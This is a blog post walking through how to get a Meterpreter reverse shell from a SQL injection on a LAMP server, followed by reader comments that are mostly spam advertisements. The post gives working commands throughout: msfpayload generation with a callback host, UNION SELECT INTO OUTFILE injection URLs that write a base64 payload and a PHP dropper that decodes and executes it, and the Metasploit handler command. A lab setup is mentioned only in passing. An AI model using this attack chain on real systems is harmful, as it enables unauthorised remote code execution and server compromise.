Anyway, I was trying to look on the interwebz for a good walkthrough on getting a reverse shell from a SQLi vulnerability on a LAMP system and couldn't find one (unless my google-fu sucks) so here is one that I have put together. This is assuming a fairly standard/secure configuration where both MySQL and Apache are not running as root and have little privileges and that your MySQL user has write privs to your www directory.
- First you need to find your SQL injection vulnerability. :)
- Next, we need to generate our payload. We will use msfpayload for this and base64 encode it twice to ensure that we don't have any bad chars when we send it to the remote server. Change the LHOST option to match your local IP. You can also specify a specific port with LPORT=<port>.
- # msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.20 X | base64 | base64
- You will then get your base64 encoded string. Copy it.
- We now need to send it to our remote server through the SQL injection vulnerability. Best place to create the file is in the /tmp directory on the remote server as any account has access to it.
- http://www.bad.site/vulnpage.php?id=-1 UNION SELECT “ZjBWTVJnRUJBUUFBQUFBQUFBQUFBQUlBQXdBQkFBQUFWSUFFQ0RRQUFBQUFBQUFBQUFBQUFEUUFJQUFCQUFBQUFBQUFBQUVBQUFBQQpBQUFBQUlBRUNBQ0FCQWk0QUFBQXVBQUFBQWNBQUFBQUVBQUFNZHRUUTFOcUFtcG1XSW5oellDWFcyakFxQUVVWm1nUlhHWlRpZUZxClpsaFFVVmVKNFVQTmdGdVp0Z3l3QTgyQS8rRT0K" INTO OUTFILE '/tmp/mettemp'
- Next we need to create a PHP page to base64 decode the payload and create a new file that the apache user can execute. This page will read the file with the base64 encoded string that we create earlier, base64 decode it, create a new file in the /tmp directory, chmod the file so its executable, then execute the file.
- http://www.bad.site/vulnpage.php?id=-1 UNION SELECT '<?php $myfile = "/tmp/mettemp"; $myfile2 = "/tmp/metexec"; $fh = fopen($myfile, "r"); $data = fread($fh, filesize($myfile)); fclose($fh); $fh2 = fopen($myfile2, "a"); fwrite($fh2, base64_decode(base64_decode($data))); fclose($fh2); system("chmod 777 " . $myfile2); system($myfile2); echo "pwned"; ?>' INTO OUTFILE '/var/www/html/rev_shell.php'
- On your local system, you need to then start your handler for the reverse shell.
- # msfcli exploit/multi/handler payload=linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.20 E
- Now all you need to do is browse to the rev_shell.php page that you created earlier and enjoy your reverse meterpreter shell.
You will only have the privs of the apache user, but then you can continue with privilege escalation for more fun.
If you want to test this out in a lab environment, you can use the Damn Vulnerable Web App (DVWA) in the Web Security Dojo VM and a BackTrack VM.
I’m asking myself, why two steps? Couldn’t you just write a small php reverse shell script and transfer that with INTO OUTFILE? That should spare one step, shouldn't it?
ReplyDeleteThe article is really fine. content should be very easy to understand.
ReplyDeleteAzure Training in Chennai | Certification | Azure Online Training Course | Azure Training in Bangalore | Certification | Azure Online Training Course | Azure Training in Hyderabad | Certification | Azure Online Training Course | Azure Training in Pune | Certification | Azure Online Training Course | Azure Training | microsoft azure certification | Azure Online Training Course
Really good information to show through this blog. I really appreciate you for all the valuable information that you are providing us through your blog.
ReplyDeletevisit : Digital Marketing Training in Chennai || Digital Marketing Course in Chennai
modular lab furniture
ReplyDeleteworld777 agent
class 9 tuition classes in gurgaon
Ajmer road best Project
cloudkeeda
what is azure
azure free account
azure data factory
grate learning
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteDownload JPG To PDF Converter - Convert JPG, BMP, TIF, GIF to PDF documents in a quick, efficient manner by turning to this handy app that .Jpg To Pdf Combine Download
ReplyDeleteA Dedicated Server requires an operating system that is compatible with the server hardware and the applications or services.
ReplyDeleteElevate your online presence with powerful singapore dedicated server. Experience unmatched performance and reliability for your business needs.
ReplyDeleteEscape to a luxurious best resort in jaipur, where royal elegance meets modern comfort. Enjoy world-class amenities, serene landscapes, and unforgettable experiences.
ReplyDelete